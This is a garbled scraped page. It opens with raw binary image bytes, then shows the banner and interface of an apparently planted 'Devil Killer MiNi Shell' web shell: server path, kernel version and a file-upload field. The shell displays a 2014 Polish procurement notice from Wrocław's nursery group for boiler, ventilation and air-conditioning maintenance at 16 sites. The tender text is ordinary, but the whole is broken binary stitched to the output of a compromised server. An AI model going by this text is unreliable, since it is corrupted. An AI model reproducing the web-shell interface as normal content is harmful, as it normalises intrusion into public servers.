JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140305/73586-N-2014.html

<p class="kh_header"><b>Wrocław: Usługi  w zakresie obsługi i konserwacji oraz napraw i usuwania awarii w  kotłowni na paliwo gazowe zlokalizowanych w Żłobku nr 15 przy ul. Łukowej oraz w Budynku Administracyjnym przy ul. Fabrycznej 15 we Wrocławiu wraz z urządzeniami odwadniającymi pomieszczenia kotłowni i aktywnym Systemem Bezpieczeństwa typu GAZEX oraz usługi  serwisowania , napraw i usuwania usterek w tym usuwania awarii systemów i urządzeń wentylacji i klimatyzacji oraz instalacji mroźniczej i chłodniczej wraz z przynależnymi urządzeniami na terenie 16 obiektów  WZŻ.Znak postępowania: ZP-6/WZŻ/2014</b><br>
<b>Numer ogłoszenia: 73586 - 2014; data zamieszczenia: 05.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wrocławski Zespół Żłobków , ul. Fabryczna 15, 53-609 Wrocław, woj. dolnośląskie, tel. 71 358 46 46, faks 71 358 46 47.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wzz.wroc.pl /www.bip.wzz.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi  w zakresie obsługi i konserwacji oraz napraw i usuwania awarii w  kotłowni na paliwo gazowe zlokalizowanych w Żłobku nr 15 przy ul. Łukowej oraz w Budynku Administracyjnym przy ul. Fabrycznej 15 we Wrocławiu wraz z urządzeniami odwadniającymi pomieszczenia kotłowni i aktywnym Systemem Bezpieczeństwa typu GAZEX oraz usługi  serwisowania , napraw i usuwania usterek w tym usuwania awarii systemów i urządzeń wentylacji i klimatyzacji oraz instalacji mroźniczej i chłodniczej wraz z przynależnymi urządzeniami na terenie 16 obiektów  WZŻ.Znak postępowania: ZP-6/WZŻ/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi  w zakresie obsługi i konserwacji oraz wykonywania napraw i usuwania awarii w  kotłowni na paliwo gazowe zlokalizowanych w Żłobku nr 15 przy ul. Łukowej we Wrocławiu oraz w Budynku Administracyjnym Wrocławskiego Zespołu Żłobków przy ul. Fabrycznej 15 we Wrocławiu wraz z urządzeniami odwadniającymi pomieszczenia kotłowni i aktywnym Systemem Bezpieczeństwa typu GAZEX oraz usługi  serwisowania , napraw i usuwania usterek w tym usuwania awarii systemów  i urządzeń wentylacji i klimatyzacji oraz instalacji mroźniczej i chłodniczej wraz z przynależnymi urządzeniami na terenie 16 obiektów  Wrocławskiego Zespołu Żłobków
Obsługa i konserwacja urządzeń kotłowni na paliwo gazowe zlokalizowanych w dwóch obiektach Wrocławskiego Zespołu Żłobków w Żłobku nr 15 przy ul. Łukowej 37 we Wrocławiu oraz w budynku administracyjnym przy ul. Fabrycznej 15 we Wrocławiu wraz z urządzeniami odwadniającymi pomieszczenia kotłowni   i Aktywnym Systemem Bezpieczeństwa typu GAZEX. 
Wykonywanie przeglądów serwisowych wraz z konserwacją i serwisowaniem (usuwanie awarii i wykonywanie napraw) systemów klimatyzacji i wentylacji wraz z przynależnymi urządzeniami w 16 obiektach Wrocławskiego Zespołu Żłobków: 
1)Żłobek nr 1 - ul. Lwowska 20, Wrocław,
2)Żłobek nr 2 - ul. Zemska 33, Wrocław,
3)Żłobek nr 3 - ul. Białowieska 27, Wrocław,
4)Żłobek nr 4 - ul. Kłodnicka 25, Wrocław,
5)Żłobek nr 5 - ul. Dokerska 5, Wrocław,
6)Żłobek nr 6 - ul. Krowia 1, Wrocław,
7)Żłobek nr 7 - ul. Drukarska 9, Wrocław,
8)Żłobek nr 8 - ul. Sądowa 6, Wrocław,
9)Żłobek nr 9 - ul. Wrońskiego 13d, Wrocław,
10)Żłobek nr 10 - ul. H. Brodatego 17, Wrocław,
11)Żłobek nr 11 - ul. Hubska 39, Wrocław,
12)Żłobek nr 12 - ul. Jugosłowiańska 85a, Wrocław,
13)Żłobek nr 13 - ul. Wieczysta 107, Wrocław,
14)Żłobek nr 14 - ul. Mulicka 4c, Wrocław,
15)Żłobek nr 15 - ul. Łukowa 37, Wrocław,
16)Budynek administracyjny - Fabryczna 15, Wrocław.
Szczegółowy opis przedmiotu zamówienia został zawarty w niżej wymienionych załącznikach:
- Projekcie  umowy stanowiącym  załącznik nr 7 do SIWZ wraz z załącznikami do umowy:
a)załącznik nr 2 - Schemat kotłowni (dotyczy Budynku Administracyjnego  Wrocławskiego Zespołu Żłobków przy ul. Fabrycznej 15 we Wrocławiu)
b)załącznik nr 3 - Wykaz urządzeń kotłowni (dotyczy Budynku Administracyjnego  Wrocławskiego Zespołu Żłobków przy ul. Fabrycznej 15 we Wrocławiu)
c)załącznik nr 4 Instrukcja Obsługi Kotła TRIOBLOC TE 16-62 C (dotyczy Budynku Administracyjnego  Wrocławskiego Zespołu Żłobków przy ul. Fabrycznej 15 we Wrocławiu)
d)załącznik nr 5  Instrukcja Obsługi Podgrzewacz c.w.u. BS 120-160 C (dotyczy Budynku Administracyjnego  Wrocławskiego Zespołu Żłobków przy ul. Fabrycznej 15 we Wrocławiu)
e)załącznik nr 6 Instrukcja obsługi Grundfosliterature-3379417 C (dotyczy Budynku Administracyjnego  Wrocławskiego Zespołu Żłobków przy ul. Fabrycznej 15 we Wrocławiu)
f)załącznik nr 7  Zawory regulacyjne 4-drog. ZR-32MA Dn 32 C (dotyczy Budynku Administracyjnego  Wrocławskiego Zespołu Żłobków przy ul. Fabrycznej 15 we Wrocławiu)
g)załącznik nr 8 instrukcja_reflex_2010 C (dotyczy Budynku Administracyjnego  Wrocławskiego Zespołu Żłobków przy ul. Fabrycznej 15 we Wrocławiu)
h)załącznik nr 9 Instrukcja obsługi_zawor_bezp_102k11 C (dotyczy Budynku Administracyjnego  Wrocławskiego Zespołu Żłobków przy ul. Fabrycznej 15 we Wrocławiu)
i)załącznik nr 10 osadnik Filtr ZETKAMA Instrukcja_821 C (dotyczy Budynku Administracyjnego  Wrocławskiego Zespołu Żłobków przy ul. Fabrycznej 15 we Wrocławiu)
j)załącznik nr 11 Instrukcja  obsługi  Manometr OI_111_113_213_ATEX_pl_pl_44822 C (dotyczy Budynku Administracyjnego  Wrocławskiego Zespołu Żłobków przy ul. Fabrycznej 15 we Wrocławiu)
k)załącznik nr 12 Schemat kotłowni gazowej (dotyczy Żłobka nr 15 przy ul. Łukowej 37 we Wrocławiu)
l)załącznik nr 13 - Lista Elementów kotłowni (dotyczy Żłobka nr 15 przy ul. Łukowej 37 we Wrocławiu)
m)załącznik nr 14 -  Kocioł C-230 Instrukcja Techniczna Instalowania i obsługi
a.(dotyczy Żłobka nr 15 przy ul. Łukowej 37 we Wrocławiu
n)załącznik nr 15 - Czujnik poziomu wody  Instrukcja rozszerzona WMS WP6 (dotyczy Żłobka nr 15 przy ul. Łukowej 37 we Wrocławiu)
o)załącznik nr 16 -  Instrukcja obsługi_zawor_bezp_102k11(dotyczy Żłobka nr 15 przy ul. Łukowej 37 we Wrocławiu)
p)załącznik nr 17 -  Instrukcja obsługi Grundfosliterature-3379417(dotyczy Żłobka nr 15 przy ul. Łukowej 37 we Wrocławiu)
q)załącznik nr 18  Katalog Grundfosliterature-1356953 (dotyczy Żłobka nr 15 przy ul. Łukowej 37 we Wrocławiu)
r)załącznik nr 19 - Instrukcja obsługi Manometr OI_111_113_213_ATEX_pl_pl_44822 (dotyczy Żłobka nr 15 przy ul. Łukowej 37 we Wrocławiu)
s)załącznik nr 20 - Instrukcja  eksploatacyjna  sprzęgła  hydraulicznego  ASH-DTR (dotyczy Żłobka nr 15 przy ul. Łukowej 37 we Wrocławiu)
t)załącznik nr 21 - Podgrzewacz Pojemnościowy BL 300 instrukcja Techniczna Instalowania i obsługi (dotyczy Żłobka nr 15 przy ul. Łukowej 37 we Wrocławiu)
u)załącznik nr 22 - instrukcja_reflex_2010(dotyczy Żłobka nr 15 przy ul. Łukowej 37 we Wrocławiu)
v)załącznik nr 23 - Zawory mieszające ESBE (dotyczy Żłobka nr 15 przy ul. Łukowej 37 we Wrocławiu)
w)załącznik nr 24 - Cosmo Water foldercw (dotyczy Żłobka nr 15 przy ul. Łukowej 37 we Wrocławiu)
x)załącznik nr 25 - Filtr siatkowy Honeywell ff06-k-pl01r0511 (dotyczy Żłobka nr 15 przy ul. Łukowej 37 we Wrocławiu)
y)załącznik nr 26 -Aktywny System Bezpieczeństwa Instalacji Gazowej.  
z)załącznik nr 27 - Minimalna częstotliwość wykonania czynności serwisowych. 
aa)załącznik nr 2a do umowy pt. Wykaz czynności wchodzących w zakres serwisu urządzeń wentylacyjnych i klimatyzacyjnych; 
bb)załącznik nr 3a do umowy pt. Częstotliwość wykonywania  usług  serwisowych urządzeń wentylacyjnych i klimatyzacyjnych;
cc)załącznik nr 4a do umowy pt. Wykaz systemów klimatyzacji i wentylacji oraz przynależnych im urządzeń; 
dd)załącznik nr 5a do umowy pt. Dokumentacja Techniczno-Ruchowa; centrale klimatyzacyjne Clima -produkt, centrale klimatyzacyjne Ventus, klimatyzator ścienny Vivax, klimatyzatory przenośne   Master.    
ee)Wzór protokołu odbioru.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.72.10.00-5, 50.72.00.00-8, 50.73.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 500,00 zł  (pięćset złotych)    w formie zgodniej z art. 45 ust. 6 ustawy PZP, tj.:
a)w pieniądzu;
b)w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)w gwarancjach bankowych;
d)w gwarancjach ubezpieczeniowych;
e)w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
2. W przypadku złożenia wadium w formie pieniężnej, wadium należy wnieść przelewem na konto 
w Banku PKO BP nr 69 1020 5226 0000 6402 0416 7797 
Wadium winno być na koncie Zamawiającego nie później niż przed upływem terminu składania ofert. Dowód potwierdzenia złożenia wadium należy załączyć do oferty.
3.W przypadku złożenia wadium w formie gwarancji, poręczeń, oryginał dokumentu należy złożyć nie później niż przed upływem terminu składania ofert w Sekretariacie WZŻ. Kopię dokumentu, należy dołączyć do oferty, za wyjątkiem pkt. 4.
4. Jeśli Wykonawca prześle ofertę pocztą/przekaże za pośrednictwem kuriera lub innej osoby,  winien kopię dowodu wniesienia wadium załączyć do oferty, natomiast oryginał umieścić w oznaczonej kopercie oryginał dowodu wniesienia wadium. 
5. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, zastrzeżeniem pkt. 12.
6. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, z zastrzeżeniem pkt. 10.
7. Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
UWAGA: W przypadku złożenia wadium w formie gwarancji lub poręczenia, dokument ten winien zawierać klauzulę gwarancji zapłaty wymaganej kwoty wadium po zaistnieniu niżej wymienionych w pkt 11 i 12 okoliczności. 
8. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium zgodnie z punktem 5, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza.
Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
9. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia  rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.
10. Wadium wraz z odsetkami wniesione w pieniądzu przez Wykonawcę, którego oferta została uznana za najkorzystniejszą, na wniosek tego Wykonawcy, zaliczane jest przez Zamawiającego na poczet zabezpieczenia należytego wykonania umowy.
11. Wykonawca, którego oferta została wybrana, traci wadium wraz z odsetkami na rzecz Zamawiającego 
w przypadku, gdy:
a)odmówił podpisania umowy na warunkach określonych w ofercie,
b)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 
12.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy PZP, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1,
lub pełnomocnictw, chyba, że udowodni, iż wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp (załącznik nr 3 do SIWZ).
 Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp (załącznik nr 3 do SIWZ).
 Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp (załącznik nr 3 do SIWZ).
 Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, gdy Wykonawca wykaże, że dysponuję minimum: 1)1 osobą z ważnymi uprawnieniami tj. świadectwem  kwalifikacyjnym  uprawniającymi do wykonywania pracy na stanowisku EKSPLOATACJI E1 w zakresie obsługi, konserwacji, kontrolno-pomiarowym, montażu 
GRUPA 1: Urządzenia, instalacje i sieci elektroenergetyczne wytwarzające, przetwarzające, przesyłające i zużywające energię elektryczną: 
2) urządzenia, instalacje i sieci elektroenergetyczne o napięciu nie wyższym niż 1KV,
10)aparatura kontrolno-pomiarowa oraz urządzenia i instalacje automatycznej regulacji, sterowania i zabezpieczeń urządzeń i instalacji w zakresie jak wyżej 
zgodnie z Rozporządzeniem ministra gospodarki, pracy i polityki społecznej z dnia 28.03.2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. z 2003 r. Nr 89, poz. 828)
a)wskaże podstawę do dysponowania tą osobą, 
b)oświadczy, że wykazana  osoba, która  będzie uczestniczyć w wykonywaniu zamówienia, posiada wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
c)Sprawdzenie w/w warunku udziału w postępowaniu odbywać się będzie na podstawie wykazu osób i przedłożonych przez Wykonawcę informacji o podstawie do dysponowania tymi zasobami i oświadczenia . 
Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia. 
2)1 osobą z ważnymi uprawnieniami tj. świadectwem  kwalifikacyjnym  uprawniającymi do wykonywania pracy na stanowisku DOZORU  D1 w zakresie obsługi, konserwacji, kontrolno-pomiarowym, montażu GRUPA  1: Urządzenia, instalacje i sieci elektroenergetyczne wytwarzające, przetwarzające, przesyłające i zużywające energię elektryczną: 
2) urządzenia, instalacje i sieci elektroenergetyczne o napięciu nie wyższym niż 1KV,
10)aparatura kontrolno-pomiarowa oraz urządzenia i instalacje automatycznej regulacji, sterowania i zabezpieczeń urządzeń i instalacji w zakresie jak wyżej
 zgodnie z Rozporządzeniem ministra gospodarki, pracy i polityki społecznej z dnia 28.03.2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. z 2003 r. Nr 89, poz. 828)
a)wskaże podstawę do dysponowania tą osobą. 
b)oświadczy, że wykazana  osoba, która  będzie uczestniczyć w wykonywaniu zamówienia, posiada wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
c)Sprawdzenie w/w warunku udziału w postępowaniu odbywać się będzie na podstawie wykazu osób i przedłożonych przez Wykonawcę informacji o podstawie do dysponowania tymi zasobami i oświadczenia . 
 Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia. 
3)1 osobą z ważnymi uprawnieniami tj. świadectwem  kwalifikacyjnym  uprawniającymi do wykonywania pracy na stanowisku EKSPLOATACJI   E2 w zakresie obsługi, konserwacji, remontów, kontrolno-pomiarowym, montażu  GRUPA 2. Urządzenia wytwarzające, przetwarzające, przesyłające i zużywające ciepło oraz inne urządzenia energetyczne:
1)kotły parowe oraz wodne na paliwo stałe, płynne i gazowe, o mocy powyżej 50 kW, wraz z urządzeniami pomocniczymi; 
2)sieci i instalacje cieplne wraz z urządzeniami pomocniczymi, o przesyle ciepła powyżej 50 kW; 
10) aparatura kontrolno-pomiarowa i urządzenia automatycznej regulacji do urządzeń i instalacji w zakresie jak wyżej
zgodnie z Rozporządzeniem ministra gospodarki, pracy i polityki społecznej z dnia 28.03.2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. z 2003 r. Nr 89, poz. 828)
a)wskaże podstawę do dysponowania tą osobą; 
b)oświadczy, że wykazana  osoba, która  będzie uczestniczyć w wykonywaniu zamówienia, posiada wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
c)Sprawdzenie w/w warunku udziału w postępowaniu odbywać się będzie na podstawie wykazu osób i przedłożonych przez Wykonawcę informacji o podstawie do dysponowania tymi zasobami i oświadczenia . 
 Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia. 
4)1 osobą z ważnymi uprawnieniami tj. świadectwem  kwalifikacyjnym  uprawniającymi do wykonywania pracy na stanowisku DOZORU  D2                           w zakresie obsługi, konserwacji, remontów, kontrolno-pomiarowym, montażu    GRUPA 2. Urządzenia wytwarzające, przetwarzające, przesyłające i zużywające ciepło oraz inne urządzenia energetyczne:
1)kotły parowe oraz wodne na paliwo stałe, płynne i gazowe, o mocy powyżej 50 kW, wraz z urządzeniami pomocniczymi; 
2)sieci i instalacje cieplne wraz z urządzeniami pomocniczymi, o przesyle ciepła powyżej 50 kW; 
10) aparatura kontrolno-pomiarowa i urządzenia automatycznej regulacji do urządzeń i instalacji w zakresie jak wyżej zgodnie z Rozporządzeniem ministra gospodarki, pracy i polityki społecznej z dnia 28.03.2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. z 2003 r. Nr 89, poz. 828)
a)wskaże podstawę do dysponowania tą osobą,
b)oświadczy, że wykazana  osoba, która  będzie uczestniczyć w wykonywaniu zamówienia, posiada wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
c)Sprawdzenie w/w warunku udziału w postępowaniu odbywać się będzie na podstawie wykazu osób i przedłożonych przez Wykonawcę informacji o podstawie do dysponowania tymi zasobami i oświadczenia . 
 Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia. 

5)	1 osobą z ważnymi uprawnieniami tj. świadectwem  kwalifikacyjnym  uprawniającymi do wykonywania pracy na stanowisku EKSPLOATACJI   E3  w zakresie obsługi, konserwacji, kontrolno-pomiarowym GRUPA 3 Urządzenia, instalacje i sieci gazowe wytwarzające, przetwarzające, przesyłające, magazynujące i zużywające paliwo gazowe:
6)Urządzenia i instalacje gazowe o ciśnieniu nie wyższym niż 5kPa; 
zgodnie z Rozporządzeniem ministra gospodarki, pracy i polityki społecznej z dnia 28.03.2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. z 2003 r. Nr 89, poz. 828)
10) aparatura kontrolno-pomiarowa i urządzenia automatycznej regulacji do urządzeń i instalacji w zakresie jak wyżej zgodnie z Rozporządzeniem ministra gospodarki, pracy i polityki społecznej z dnia 28.03.2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. z 2003 r. Nr 89, poz. 828)

a)wskaże podstawę do dysponowania tymi osobami,
b)oświadczy, że wykazana  osoba, która  będzie uczestniczyć w wykonywaniu zamówienia, posiada wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
c)Sprawdzenie w/w warunku udziału w postępowaniu odbywać się będzie na podstawie wykazu osób i przedłożonych przez Wykonawcę informacji o podstawie do dysponowania tymi zasobami i oświadczenia . 
 Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia. 
6)	1 osobą z ważnymi uprawnieniami tj. świadectwem  kwalifikacyjnym  uprawniającymi do wykonywania pracy na stanowisku DOZORU  D3                        w zakresie obsługi, konserwacji, kontrolno-pomiarowym GRUPA 3 .Urządzenia, instalacje i sieci gazowe wytwarzające, przetwarzające, przesyłające, magazynujące i zużywające paliwo gazowe:
6)Urządzenia i instalacje gazowe o ciśnieniu nie wyższym niż 5kPa; 
zgodnie z Rozporządzeniem ministra gospodarki, pracy i polityki społecznej z dnia 28.03.2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. z 2003 r. Nr 89, poz. 828)
